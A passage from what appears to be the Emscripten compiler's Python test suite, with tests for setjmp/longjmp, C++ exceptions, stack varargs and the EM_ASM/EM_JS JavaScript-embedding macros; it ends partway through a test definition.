def test_sup(self):
self.do_run_in_out_file_test(test_file('core/test_sup.cpp'))
@also_with_standalone_wasm()
def test_assert(self):
self.do_core_test('test_assert.cpp', assert_returncode=NON_ZERO)
def test_wcslen(self):
self.do_core_test('test_wcslen.c')
def test_regex(self):
self.do_core_test('test_regex.c')
@also_with_standalone_wasm(wasm2c=True, impure=True)
def test_longjmp_standalone(self):
self.do_core_test('test_longjmp.c')
@with_both_eh_sjlj
def test_longjmp(self):
self.do_core_test('test_longjmp.c')
def test_longjmp_with_and_without_exceptions(self):
# Emscripten SjLj with and without Emscripten EH support
self.set_setting('SUPPORT_LONGJMP', 'emscripten')
self.set_setting('DEFAULT_TO_CXX') # See comments on @with_both_eh_sjlj
for disable_catching in [0, 1]:
self.set_setting('DISABLE_EXCEPTION_CATCHING', disable_catching)
self.do_core_test('test_longjmp.c')
# Wasm SjLj with and without Wasm EH support
self.set_setting('SUPPORT_LONGJMP', 'wasm')
if not self.is_wasm():
self.skipTest('wasm2js does not support wasm EH/SjLj')
self.require_v8()
# FIXME Temporarily disabled. Enable this later when the bug is fixed.
if '-fsanitize=address' in self.emcc_args:
self.skipTest('Wasm EH does not work with asan yet')
self.emcc_args.append('-fwasm-exceptions')
self.v8_args.append('--experimental-wasm-eh')
old_args = self.emcc_args.copy()
for arg in ['-fwasm-exceptions', '-fno-exceptions']:
self.emcc_args.append(arg)
self.do_core_test('test_longjmp.c')
self.emcc_args = old_args
@with_both_eh_sjlj
def test_longjmp2(self):
self.do_core_test('test_longjmp2.c')
@needs_dylink
@with_both_eh_sjlj
def test_longjmp2_main_module(self):
# Test for binaryen regression:
# https://github.com/WebAssembly/binaryen/issues/2180
self.set_setting('MAIN_MODULE')
self.do_core_test('test_longjmp2.c')
@with_both_eh_sjlj
def test_longjmp3(self):
self.do_core_test('test_longjmp3.c')
@with_both_eh_sjlj
def test_longjmp4(self):
self.do_core_test('test_longjmp4.c')
@with_both_eh_sjlj
def test_longjmp_funcptr(self):
self.do_core_test('test_longjmp_funcptr.c')
@with_both_eh_sjlj
def test_longjmp_repeat(self):
self.do_core_test('test_longjmp_repeat.c')
@with_both_eh_sjlj
def test_longjmp_stacked(self):
self.do_core_test('test_longjmp_stacked.c', assert_returncode=NON_ZERO)
@with_both_eh_sjlj
def test_longjmp_exc(self):
self.do_core_test('test_longjmp_exc.c', assert_returncode=NON_ZERO)
def test_longjmp_throw(self):
for disable_throw in [0, 1]:
print(disable_throw)
self.set_setting('DISABLE_EXCEPTION_CATCHING', disable_throw)
self.do_core_test('test_longjmp_throw.cpp')
@with_both_eh_sjlj
def test_longjmp_unwind(self):
self.do_core_test('test_longjmp_unwind.c', assert_returncode=NON_ZERO)
@with_both_eh_sjlj
def test_longjmp_i64(self):
self.emcc_args += ['-g']
self.do_core_test('test_longjmp_i64.c', assert_returncode=NON_ZERO)
@with_both_eh_sjlj
def test_siglongjmp(self):
self.do_core_test('test_siglongjmp.c')
@with_both_eh_sjlj
def test_setjmp_many(self):
src = r'''
#include <stdio.h>
#include <setjmp.h>
int main(int argc, char** argv) {
jmp_buf buf;
for (int i = 0; i < NUM; i++) printf("%d\n", setjmp(buf));
if (argc-- == 1131) longjmp(buf, 11);
return 0;
}
'''
for num in [1, 5, 20, 1000]:
print('NUM=%d' % num)
self.do_run(src.replace('NUM', str(num)), '0\n' * num)
@with_both_eh_sjlj
def test_setjmp_many_2(self):
src = r'''
#include <setjmp.h>
#include <stdio.h>
jmp_buf env;
void luaWork(int d){
int x;
printf("d is at %d\n", d);
longjmp(env, 1);
}
int main()
{
const int ITERATIONS=25;
for(int i = 0; i < ITERATIONS; i++){
if(!setjmp(env)){
luaWork(i);
}
}
return 0;
}
'''
self.do_run(src, r'''d is at 24''')
@with_both_eh_sjlj
def test_setjmp_noleak(self):
self.do_runf(test_file('core/test_setjmp_noleak.c'), 'ok.')
@with_both_eh_sjlj
def test_setjmp_within_loop(self):
self.do_core_test('test_setjmp_within_loop.c')
@with_both_eh_sjlj
def test_exceptions(self):
self.set_setting('EXCEPTION_DEBUG')
self.maybe_closure()
self.do_run_from_file(test_file('core/test_exceptions.cpp'), test_file('core/test_exceptions_caught.out'))
def test_exceptions_with_and_without_longjmp(self):
self.set_setting('EXCEPTION_DEBUG')
self.maybe_closure()
# Emscripten EH with and without Emscripten SjLj support
self.set_setting('DISABLE_EXCEPTION_CATCHING', 0)
for support_longjmp in [0, 'emscripten']:
self.set_setting('SUPPORT_LONGJMP', support_longjmp)
self.do_run_from_file(test_file('core/test_exceptions.cpp'), test_file('core/test_exceptions_caught.out'))
# Wasm EH with and without Wasm SjLj support
self.set_setting('DISABLE_EXCEPTION_CATCHING', 1)
if not self.is_wasm():
self.skipTest('wasm2js does not support wasm EH/SjLj')
self.require_v8()
# FIXME Temporarily disabled. Enable this later when the bug is fixed.
if '-fsanitize=address' in self.emcc_args:
self.skipTest('Wasm EH does not work with asan yet')
self.emcc_args.append('-fwasm-exceptions')
self.v8_args.append('--experimental-wasm-eh')
for support_longjmp in [0, 'wasm']:
self.set_setting('SUPPORT_LONGJMP', support_longjmp)
self.do_run_from_file(test_file('core/test_exceptions.cpp'), test_file('core/test_exceptions_caught.out'))
def test_exceptions_off(self):
for support_longjmp in [0, 1]:
self.set_setting('DISABLE_EXCEPTION_CATCHING')
self.do_run_from_file(test_file('core/test_exceptions.cpp'), test_file('core/test_exceptions_uncaught.out'), assert_returncode=NON_ZERO)
@no_asan('TODO: ASan support in minimal runtime')
def test_exceptions_minimal_runtime(self):
self.set_setting('EXCEPTION_DEBUG')
self.set_setting('EXIT_RUNTIME')
self.maybe_closure()
self.set_setting('MINIMAL_RUNTIME')
self.emcc_args += ['--pre-js', test_file('minimal_runtime_exit_handling.js')]
for support_longjmp in [0, 1]:
self.set_setting('SUPPORT_LONGJMP', support_longjmp)
self.set_setting('DISABLE_EXCEPTION_CATCHING', 0)
self.do_run_from_file(test_file('core/test_exceptions.cpp'), test_file('core/test_exceptions_caught.out'))
self.set_setting('DISABLE_EXCEPTION_CATCHING')
self.do_run_from_file(test_file('core/test_exceptions.cpp'), test_file('core/test_exceptions_uncaught.out'), assert_returncode=NON_ZERO)
@with_both_eh_sjlj
def test_exceptions_custom(self):
self.set_setting('EXCEPTION_DEBUG')
# needs to flush stdio streams
self.set_setting('EXIT_RUNTIME')
self.maybe_closure()
src = '''
#include <iostream>
class MyException
{
public:
MyException(){ std::cout << "Construct..."; }
MyException( const MyException & ) { std::cout << "Copy..."; }
~MyException(){ std::cout << "Destruct..."; }
};
int function()
{
std::cout << "Throw...";
throw MyException();
}
int function2()
{
return function();
}
int main()
{
try
{
function2();
}
catch (MyException & e)
{
std::cout << "Caught...";
}
try
{
function2();
}
catch (MyException e)
{
std::cout << "Caught...";
}
return 0;
}
'''
self.do_run(src, 'Throw...Construct...Caught...Destruct...Throw...Construct...Copy...Caught...Destruct...Destruct...')
@with_both_eh_sjlj
def test_exceptions_2(self):
for safe in [0, 1]:
print(safe)
if safe and '-fsanitize=address' in self.emcc_args:
# Can't use safe heap with ASan
continue
self.set_setting('SAFE_HEAP', safe)
self.do_core_test('test_exceptions_2.cpp')
@with_both_eh_sjlj
def test_exceptions_3(self):
src = r'''
#include <iostream>
#include <stdexcept>
int main(int argc, char **argv)
{
if (argc != 2) {
std::cout << "need an arg" << std::endl;
return 1;
}
int arg = argv[1][0] - '0';
try {
if (arg == 0) throw "a c string";
if (arg == 1) throw std::exception();
if (arg == 2) throw std::runtime_error("Hello");
} catch(const char * ex) {
std::cout << "Caught C string: " << ex << std::endl;
} catch(const std::exception &ex) {
std::cout << "Caught exception: " << ex.what() << std::endl;
} catch(...) {
std::cout << "Caught something else" << std::endl;
}
std::cout << "Done.\n";
}
'''
print('0')
self.do_run(src, 'Caught C string: a c string\nDone.', args=['0'])
print('1')
self.do_run('src.js', 'Caught exception: std::exception\nDone.', args=['1'], no_build=True)
print('2')
self.do_run('src.js', 'Caught exception: Hello\nDone.', args=['2'], no_build=True)
def test_exceptions_allowed(self):
self.set_setting('EXCEPTION_CATCHING_ALLOWED', ["_Z12somefunctionv"])
# otherwise it is inlined and not identified
self.set_setting('INLINING_LIMIT')
self.do_core_test('test_exceptions_allowed.cpp')
size = os.path.getsize('test_exceptions_allowed.js')
if self.is_wasm():
size += os.path.getsize('test_exceptions_allowed.wasm')
shutil.copyfile('test_exceptions_allowed.js', 'orig.js')
# check that an empty allow list works properly (as in, same as exceptions disabled)
src = test_file('core/test_exceptions_allowed.cpp')
empty_output = test_file('core/test_exceptions_allowed_empty.out')
self.set_setting('EXCEPTION_CATCHING_ALLOWED', [])
self.do_run_from_file(src, empty_output, assert_returncode=NON_ZERO)
empty_size = os.path.getsize('test_exceptions_allowed.js')
if self.is_wasm():
empty_size += os.path.getsize('test_exceptions_allowed.wasm')
shutil.copyfile('test_exceptions_allowed.js', 'empty.js')
self.set_setting('EXCEPTION_CATCHING_ALLOWED', ['fake'])
self.do_run_from_file(src, empty_output, assert_returncode=NON_ZERO)
fake_size = os.path.getsize('test_exceptions_allowed.js')
if self.is_wasm():
fake_size += os.path.getsize('test_exceptions_allowed.wasm')
shutil.copyfile('test_exceptions_allowed.js', 'fake.js')
self.clear_setting('EXCEPTION_CATCHING_ALLOWED')
self.do_run_from_file(src, empty_output, assert_returncode=NON_ZERO)
disabled_size = os.path.getsize('test_exceptions_allowed.js')
if self.is_wasm():
disabled_size += os.path.getsize('test_exceptions_allowed.wasm')
shutil.copyfile('test_exceptions_allowed.js', 'disabled.js')
print('size: %d' % size)
print('empty_size: %d' % empty_size)
print('fake_size: %d' % fake_size)
print('disabled_size: %d' % disabled_size)
# empty list acts the same as fully disabled
self.assertEqual(empty_size, disabled_size)
# big change when we disable exception catching of the function
if '-fsanitize=leak' not in self.emcc_args:
self.assertGreater(size - empty_size, 0.01 * size)
# full disable can remove a little bit more
self.assertLess(disabled_size, fake_size)
def test_exceptions_allowed_2(self):
self.set_setting('EXCEPTION_CATCHING_ALLOWED', ["main"])
# otherwise it is inlined and not identified
self.set_setting('INLINING_LIMIT')
self.do_core_test('test_exceptions_allowed_2.cpp')
# When 'main' function does not have a signature, its contents will be
# outlined to '__original_main'. Check if we can handle that case.
self.emcc_args += ['-DMAIN_NO_SIGNATURE']
self.do_core_test('test_exceptions_allowed_2.cpp')
def test_exceptions_allowed_uncaught(self):
self.emcc_args += ['-std=c++11']
self.set_setting('EXCEPTION_CATCHING_ALLOWED', ["_Z4testv"])
# otherwise it is inlined and not identified
self.set_setting('INLINING_LIMIT')
self.do_core_test('test_exceptions_allowed_uncaught.cpp')
def test_exceptions_allowed_misuse(self):
self.set_setting('EXCEPTION_CATCHING_ALLOWED', ['foo'])
# Test old =2 setting for DISABLE_EXCEPTION_CATCHING
self.set_setting('DISABLE_EXCEPTION_CATCHING', 2)
err = self.expect_fail([EMCC, test_file('hello_world.c')] + self.get_emcc_args())
self.assertContained('error: DISABLE_EXCEPTION_CATCHING=X is no longer needed when specifying EXCEPTION_CATCHING_ALLOWED [-Wdeprecated] [-Werror]', err)
# =0 should also be a warning
self.set_setting('DISABLE_EXCEPTION_CATCHING', 0)
err = self.expect_fail([EMCC, test_file('hello_world.c')] + self.get_emcc_args())
self.assertContained('error: DISABLE_EXCEPTION_CATCHING=X is no longer needed when specifying EXCEPTION_CATCHING_ALLOWED [-Wdeprecated] [-Werror]', err)
# =1 should be a hard error
self.set_setting('DISABLE_EXCEPTION_CATCHING', 1)
err = self.expect_fail([EMCC, test_file('hello_world.c')] + self.get_emcc_args())
self.assertContained('error: DISABLE_EXCEPTION_CATCHING and EXCEPTION_CATCHING_ALLOWED are mutually exclusive', err)
# even setting an empty list should trigger the error;
self.set_setting('EXCEPTION_CATCHING_ALLOWED', [])
err = self.expect_fail([EMCC, test_file('hello_world.c')] + self.get_emcc_args())
self.assertContained('error: DISABLE_EXCEPTION_CATCHING and EXCEPTION_CATCHING_ALLOWED are mutually exclusive', err)
@with_both_eh_sjlj
def test_exceptions_uncaught(self):
# needs to flush stdio streams
self.set_setting('EXIT_RUNTIME')
src = r'''
#include <stdio.h>
#include <exception>
struct X {
~X() {
printf("exception? %s\n", std::uncaught_exception() ? "yes" : "no");
}
};
int main() {
printf("exception? %s\n", std::uncaught_exception() ? "yes" : "no");
try {
X x;
throw 1;
} catch(...) {
printf("exception? %s\n", std::uncaught_exception() ? "yes" : "no");
}
printf("exception? %s\n", std::uncaught_exception() ? "yes" : "no");
return 0;
}
'''
self.do_run(src, 'exception? no\nexception? yes\nexception? no\nexception? no\n')
src = r'''
#include <fstream>
#include <iostream>
int main() {
std::ofstream os("test");
os << std::unitbuf << "foo"; // trigger a call to std::uncaught_exception from
// std::basic_ostream::sentry::~sentry
std::cout << "success";
}
'''
self.do_run(src, 'success')
@with_both_eh_sjlj
def test_exceptions_uncaught_2(self):
# needs to flush stdio streams
self.set_setting('EXIT_RUNTIME')
src = r'''
#include <iostream>
#include <exception>
int main() {
try {
throw std::exception();
} catch(std::exception) {
try {
throw;
} catch(std::exception) {}
}
if (std::uncaught_exception())
std::cout << "ERROR: uncaught_exception still set.";
else
std::cout << "OK";
}
'''
self.do_run(src, 'OK\n')
@with_both_eh_sjlj
def test_exceptions_typed(self):
# needs to flush stdio streams
self.set_setting('EXIT_RUNTIME')
self.clear_setting('SAFE_HEAP') # Throwing null will cause an ignorable null pointer access.
self.do_core_test('test_exceptions_typed.cpp')
@with_both_eh_sjlj
def test_exceptions_virtual_inheritance(self):
self.do_core_test('test_exceptions_virtual_inheritance.cpp')
@with_both_eh_sjlj
def test_exceptions_convert(self):
self.do_core_test('test_exceptions_convert.cpp')
# TODO Make setjmp-longjmp also use Wasm exception handling
@with_both_eh_sjlj
def test_exceptions_multi(self):
self.do_core_test('test_exceptions_multi.cpp')
@with_both_eh_sjlj
def test_exceptions_std(self):
self.clear_setting('SAFE_HEAP')
self.do_core_test('test_exceptions_std.cpp')
@with_both_eh_sjlj
def test_exceptions_alias(self):
self.do_core_test('test_exceptions_alias.cpp')
@with_both_eh_sjlj
def test_exceptions_rethrow(self):
self.do_core_test('test_exceptions_rethrow.cpp')
@with_both_eh_sjlj
def test_exceptions_uncaught_count(self):
self.do_core_test('test_exceptions_uncaught_count.cpp')
@with_both_eh_sjlj
def test_exceptions_resume(self):
self.set_setting('EXCEPTION_DEBUG')
self.do_core_test('test_exceptions_resume.cpp')
@with_both_eh_sjlj
def test_exceptions_destroy_virtual(self):
self.do_core_test('test_exceptions_destroy_virtual.cpp')
@with_both_eh_sjlj
def test_exceptions_refcount(self):
self.do_core_test('test_exceptions_refcount.cpp')
@with_both_eh_sjlj
def test_exceptions_primary(self):
self.do_core_test('test_exceptions_primary.cpp')
@with_both_eh_sjlj
def test_exceptions_simplify_cfg(self):
self.do_core_test('test_exceptions_simplify_cfg.cpp')
@with_both_eh_sjlj
def test_exceptions_libcxx(self):
self.do_core_test('test_exceptions_libcxx.cpp')
@with_both_eh_sjlj
def test_exceptions_multiple_inherit(self):
self.do_core_test('test_exceptions_multiple_inherit.cpp')
@with_both_eh_sjlj
def test_exceptions_multiple_inherit_rethrow(self):
self.do_core_test('test_exceptions_multiple_inherit_rethrow.cpp')
@with_both_eh_sjlj
def test_exceptions_rethrow_missing(self):
create_file('main.cpp', 'int main() { throw; }')
self.do_runf('main.cpp', None, assert_returncode=NON_ZERO)
@with_both_eh_sjlj
def test_bad_typeid(self):
self.do_run(r'''
// exception example
#include <iostream> // std::cerr
#include <typeinfo> // operator typeid
#include <exception> // std::exception
class Polymorphic {virtual void member(){}};
int main () {
try
{
Polymorphic * pb = 0;
const std::type_info& ti = typeid(*pb); // throws a bad_typeid exception
}
catch (std::exception& e)
{
std::cerr << "exception caught: " << e.what() << '\n';
}
return 0;
}
''', 'exception caught: std::bad_typeid')
def test_iostream_ctors(self):
# iostream stuff must be globally constructed before user global
# constructors, so iostream works in global constructors
self.do_run(r'''
#include <iostream>
struct A {
A() { std::cout << "bug"; }
};
A a;
int main() {
std::cout << "free code" << std::endl;
return 0;
}
''', 'bugfree code')
@with_both_eh_sjlj
def test_exceptions_longjmp1(self):
self.do_core_test('test_exceptions_longjmp1.cpp')
@with_both_eh_sjlj
def test_exceptions_longjmp2(self):
self.do_core_test('test_exceptions_longjmp2.cpp')
@with_both_eh_sjlj
def test_exceptions_longjmp3(self):
self.do_core_test('test_exceptions_longjmp3.cpp')
@with_both_eh_sjlj
def test_exceptions_longjmp4(self):
self.do_core_test('test_exceptions_longjmp4.cpp')
# Marked as impure since the WASI reactor modules (modules without main)
# are not yet suppored by the wasm engines we test against.
@also_with_standalone_wasm(impure=True)
def test_ctors_no_main(self):
self.emcc_args.append('--no-entry')
self.do_core_test('test_ctors_no_main.cpp')
@no_wasm2js('eval_ctors not supported yet')
@also_with_standalone_wasm(impure=True)
def test_eval_ctors_no_main(self):
self.set_setting('EVAL_CTORS')
self.emcc_args.append('--no-entry')
self.do_core_test('test_ctors_no_main.cpp')
def test_class(self):
self.do_core_test('test_class.cpp')
def test_inherit(self):
self.do_core_test('test_inherit.cpp')
def test_isdigit_l(self):
# needs to flush stdio streams
self.set_setting('EXIT_RUNTIME')
self.do_core_test('test_isdigit_l.cpp')
def test_iswdigit(self):
# needs to flush stdio streams
self.set_setting('EXIT_RUNTIME')
self.do_core_test('test_iswdigit.cpp')
def test_polymorph(self):
self.do_core_test('test_polymorph.cpp')
def test_complex(self):
self.do_core_test('test_complex.c')
def test_float_builtins(self):
# tests wasm_libc_rt
self.do_core_test('test_float_builtins.c')
@no_asan('SAFE_HEAP cannot be used with ASan')
def test_segfault(self):
self.set_setting('SAFE_HEAP')
for addr in ['get_null()', 'new D2()']:
print(addr)
src = r'''
#include <stdio.h>
#include <emscripten.h>
struct Classey {
virtual void doIt() = 0;
virtual ~Classey() = default;
};
struct D1 : Classey {
virtual void doIt() { printf("fleefl\n"); }
};
struct D2 : Classey {
virtual void doIt() { printf("marfoosh\n"); }
};
EM_JS(Classey*, get_null, (), {
return 0;
});
int main(int argc, char **argv) {
Classey *p = argc == 100 ? new D1() : (Classey*)%s;
p->doIt();
delete p;
return 0;
}
''' % addr
if 'get_null' in addr:
self.do_run(src, 'segmentation fault', assert_returncode=NON_ZERO)
else:
self.do_run(src, 'marfoosh')
def test_dynamic_cast(self):
self.do_core_test('test_dynamic_cast.cpp')
def test_dynamic_cast_b(self):
self.do_core_test('test_dynamic_cast_b.cpp')
def test_dynamic_cast_2(self):
self.do_core_test('test_dynamic_cast_2.cpp')
def test_funcptr(self):
self.do_core_test('test_funcptr.c')
def test_mathfuncptr(self):
self.do_core_test('test_mathfuncptr.c')
def test_funcptrfunc(self):
self.do_core_test('test_funcptrfunc.c')
def test_funcptr_namecollide(self):
self.do_core_test('test_funcptr_namecollide.c')
def test_emptyclass(self):
self.do_core_test('test_emptyclass.cpp')
def test_alloca(self):
self.do_core_test('test_alloca.c')
@also_with_wasmfs
def test_rename(self):
if is_sanitizing(self.emcc_args) and self.get_setting('WASMFS'):
self.skipTest('https://github.com/emscripten-core/emscripten/issues/15820')
self.do_run_in_out_file_test('stdio/test_rename.c')
def test_remove(self):
# needs to flush stdio streams
self.set_setting('EXIT_RUNTIME')
self.do_run_in_out_file_test('cstdio/test_remove.cpp')
def test_alloca_stack(self):
self.do_core_test('test_alloca_stack.c')
def test_stack_byval(self):
self.do_core_test('test_stack_byval.cpp')
def test_stack_varargs(self):
# in node.js we allocate argv[0] on the stack, which means the length
# of the program directory influences how much stack we need, and so
# long random temp dir names can lead to random failures. The stack
# size was increased here to avoid that.
self.set_setting('INLINING_LIMIT')
self.set_setting('TOTAL_STACK', 8 * 1024)
self.do_core_test('test_stack_varargs.c')
def test_stack_varargs2(self):
# in node.js we allocate argv[0] on the stack, which means the length
# of the program directory influences how much stack we need, and so
# long random temp dir names can lead to random failures. The stack
# size was increased here to avoid that.
self.set_setting('TOTAL_STACK', 8 * 1024)
src = r'''
#include <stdio.h>
#include <stdlib.h>
void func(int i) {
}
int main() {
for (int i = 0; i < 7000; i++) {
printf("%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d\n",
i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i);
}
printf("ok!\n");
return 0;
}
'''
self.do_run(src, 'ok!')
print('with return')
src = r'''
#include <stdio.h>
#include <stdlib.h>
int main() {
for (int i = 0; i < 7000; i++) {
int j = printf("%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d",
i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i);
printf(" (%d)\n", j);
}
printf("ok!\n");
return 0;
}
'''
self.do_run(src, 'ok!')
print('with definitely no return')
src = r'''
#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
void vary(const char *s, ...)
{
va_list v;
va_start(v, s);
char d[20];
vsnprintf(d, 20, s, v);
puts(d);
// Try it with copying
va_list tempva;
va_copy(tempva, v);
vsnprintf(d, 20, s, tempva);
puts(d);
va_end(v);
}
int main() {
for (int i = 0; i < 7000; i++) {
int j = printf("%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d",
i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i);
printf(" (%d)\n", j);
vary("*cheez: %d+%d*", 99, 24);
vary("*albeit*");
}
printf("ok!\n");
return 0;
}
'''
self.do_run(src, 'ok!')
def test_stack_void(self):
self.emcc_args.append('-Wno-format-extra-args')
self.set_setting('INLINING_LIMIT')
self.do_core_test('test_stack_void.c')
def test_life(self):
self.emcc_args += ['-std=c99']
self.do_run_in_out_file_test('life.c', args=['2'])
def test_array2(self):
self.do_core_test('test_array2.c')
def test_array2b(self):
self.do_core_test('test_array2b.c')
def test_constglobalstructs(self):
self.do_core_test('test_constglobalstructs.c')
def test_conststructs(self):
self.do_core_test('test_conststructs.c')
def test_bigarray(self):
self.do_core_test('test_bigarray.c')
def test_mod_globalstruct(self):
self.do_core_test('test_mod_globalstruct.c')
def test_sizeof(self):
self.do_core_test('test_sizeof.cpp')
def test_llvm_used(self):
self.do_core_test('test_llvm_used.c')
@no_asan('SAFE_HEAP cannot be used with ASan')
def test_set_align(self):
self.set_setting('SAFE_HEAP')
self.do_core_test('test_set_align.c')
def test_emscripten_api(self):
self.set_setting('EXPORTED_FUNCTIONS', ['_main', '_save_me_aimee'])
self.do_core_test('test_emscripten_api.cpp')
# Sanitizers are not compatible with LINKABLE (dynamic linking.
if not is_sanitizing(self.emcc_args):
# test EXPORT_ALL
self.set_setting('EXPORTED_FUNCTIONS', [])
self.set_setting('EXPORT_ALL')
self.set_setting('LINKABLE')
self.do_core_test('test_emscripten_api.cpp')
def test_emscripten_run_script_string_int(self):
src = r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
const char *str = emscripten_run_script_string("1+1");
printf("got string: %s\n", str);
return 0;
}
'''
self.do_run(src, '''got string: 2''')
def test_emscripten_run_script_string_utf8(self):
src = r'''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <emscripten.h>
int main() {
const char *str = emscripten_run_script_string("'\\u2603 \\u2603 \\u2603 Hello!'");
printf("length of returned string: %zu. Position of substring 'Hello': %zu\n", strlen(str), strstr(str, "Hello")-str);
return 0;
}
'''
self.do_run(src, '''length of returned string: 18. Position of substring 'Hello': 12''')
def test_emscripten_run_script_string_null(self):
src = r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
const char *str = emscripten_run_script_string("void(0)");
if (str) {
printf("got string: %s\n", str);
} else {
puts("got null");
}
return 0;
}
'''
self.do_run(src, 'got null')
def test_emscripten_get_now(self):
self.banned_js_engines = [config.V8_ENGINE] # timer limitations in v8 shell
# needs to flush stdio streams
self.set_setting('EXIT_RUNTIME')
self.maybe_closure()
self.do_runf(test_file('emscripten_get_now.cpp'), 'Timer resolution is good')
def test_emscripten_get_compiler_setting(self):
src = test_file('core/emscripten_get_compiler_setting.c')
output = shared.replace_suffix(src, '.out')
# with assertions, a nice message is shown
self.set_setting('ASSERTIONS')
self.do_runf(src, 'You must build with -s RETAIN_COMPILER_SETTINGS=1', assert_returncode=NON_ZERO)
self.clear_setting('ASSERTIONS')
self.set_setting('RETAIN_COMPILER_SETTINGS')
self.do_runf(src, read_file(output).replace('waka', shared.EMSCRIPTEN_VERSION))
def test_emscripten_has_asyncify(self):
src = r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
printf("%d\n", emscripten_has_asyncify());
return 0;
}
'''
self.set_setting('ASYNCIFY', 0)
self.do_run(src, '0')
self.set_setting('ASYNCIFY')
self.do_run(src, '1')
# TODO: test only worked in non-fastcomp
def test_inlinejs(self):
self.skipTest('non-fastcomp is deprecated and fails in 3.5') # only supports EM_ASM
self.do_core_test('test_inlinejs.c')
if self.emcc_args == []:
# opts will eliminate the comments
out = read_file('src.js')
for i in range(1, 5):
assert ('comment%d' % i) in out
# TODO: test only worked in non-fastcomp
def test_inlinejs2(self):
self.skipTest('non-fastcomp is deprecated and fails in 3.5') # only supports EM_ASM
self.do_core_test('test_inlinejs2.c')
def test_inlinejs3(self):
if self.is_wasm():
self.skipTest('wasm requires a proper asm module')
src = test_file('core/test_inlinejs3.c')
output = shared.unsuffixed(src) + '.out'
self.do_core_test('test_inlinejs3.c')
print('no debugger, check validation')
src = read_file(src).replace('emscripten_debugger();', '')
self.do_run(src, read_file(output))
def test_inlinejs4(self):
self.do_run(r'''
#include <emscripten.h>
#define TO_STRING_INNER(x) #x
#define TO_STRING(x) TO_STRING_INNER(x)
#define assert_msg(msg, file, line) EM_ASM( throw 'Assert (' + msg + ') failed in ' + file + ':' + line + '!'; )
#define assert(expr) { \
if (!(expr)) { \
assert_msg(#expr, TO_STRING(__FILE__), TO_STRING(__LINE__)); \
} \
}
int main(int argc, char **argv) {
assert(argc != 17);
assert(false);
return 0;
}
''', 'false', assert_returncode=NON_ZERO)
def test_em_asm(self):
self.do_core_test('test_em_asm.cpp')
self.emcc_args.append('-std=gnu89')
self.do_core_test('test_em_asm.cpp', force_c=True)
# Tests various different ways to invoke the EM_ASM(), EM_ASM_INT()
# and EM_ASM_DOUBLE() macros.
def test_em_asm_2(self):
self.do_core_test('test_em_asm_2.cpp')
self.emcc_args.append('-std=gnu89')
self.do_core_test('test_em_asm_2.cpp', force_c=True)
# Tests various different ways to invoke the MAIN_THREAD_EM_ASM(), MAIN_THREAD_EM_ASM_INT() and MAIN_THREAD_EM_ASM_DOUBLE() macros.
# This test is identical to test_em_asm_2, just search-replaces EM_ASM to MAIN_THREAD_EM_ASM on the test file. That way if new
# test cases are added to test_em_asm_2.cpp for EM_ASM, they will also get tested in MAIN_THREAD_EM_ASM form.
def test_main_thread_em_asm(self):
src = read_file(test_file('core/test_em_asm_2.cpp'))
create_file('src.cpp', src.replace('EM_ASM', 'MAIN_THREAD_EM_ASM'))
expected_result = read_file(test_file('core/test_em_asm_2.out'))
create_file('result.out', expected_result.replace('EM_ASM', 'MAIN_THREAD_EM_ASM'))
self.do_run_from_file('src.cpp', 'result.out')
self.do_run_from_file('src.cpp', 'result.out', force_c=True)
def test_main_thread_async_em_asm(self):
self.do_core_test('test_main_thread_async_em_asm.cpp')
self.do_core_test('test_main_thread_async_em_asm.cpp', force_c=True)
# Tests MAIN_THREAD_EM_ASM_INT() function call with different signatures.
def test_main_thread_em_asm_signatures(self):
self.do_core_test('test_em_asm_signatures.cpp', assert_returncode=NON_ZERO)
def test_em_asm_unicode(self):
self.do_core_test('test_em_asm_unicode.cpp')
self.do_core_test('test_em_asm_unicode.cpp', force_c=True)
def test_em_asm_types(self):
self.do_core_test('test_em_asm_types.cpp')
self.do_core_test('test_em_asm_types.cpp', force_c=True)
def test_em_asm_unused_arguments(self):
self.do_core_test('test_em_asm_unused_arguments.cpp')
# Verify that EM_ASM macros support getting called with multiple arities.
# Maybe tests will later be joined into larger compilation units?
# Then this must still be compiled separately from other code using EM_ASM
# macros with arities 1-3. Otherwise this may incorrectly report a success.
def test_em_asm_parameter_pack(self):
self.do_core_test('test_em_asm_parameter_pack.cpp')
def test_em_asm_arguments_side_effects(self):
self.do_core_test('test_em_asm_arguments_side_effects.cpp')
self.do_core_test('test_em_asm_arguments_side_effects.cpp', force_c=True)
def test_em_asm_direct(self):
self.do_core_test('test_em_asm_direct.c')
@parameterized({
'': ([], False),
'c': ([], True),
'linked': (['-sMAIN_MODULE'], False),
'linked_c': (['-sMAIN_MODULE'], True),
})
def test_em_js(self, args, force_c):
if '-sMAIN_MODULE' in args:
self.check_dylink()
self.emcc_args += args
if '-sMAIN_MODULE' not in args:
self.emcc_args += ['-sEXPORTED_FUNCTIONS=_main,_malloc']
self.do_core_test('test_em_js.cpp', force_c=force_c)
self.assertContained("no args returning int", read_file('test_em_js.js'))
def test_runtime_stacksave(self):
self.do_runf(test_file('core/test_runtime_stacksave.c'), 'success')
# Tests that -s MINIMAL_RUNTIME=1 builds can utilize -s ALLOW_MEMORY_GROWTH=1 option.
def test_minimal_runtime_memorygrowth(self):
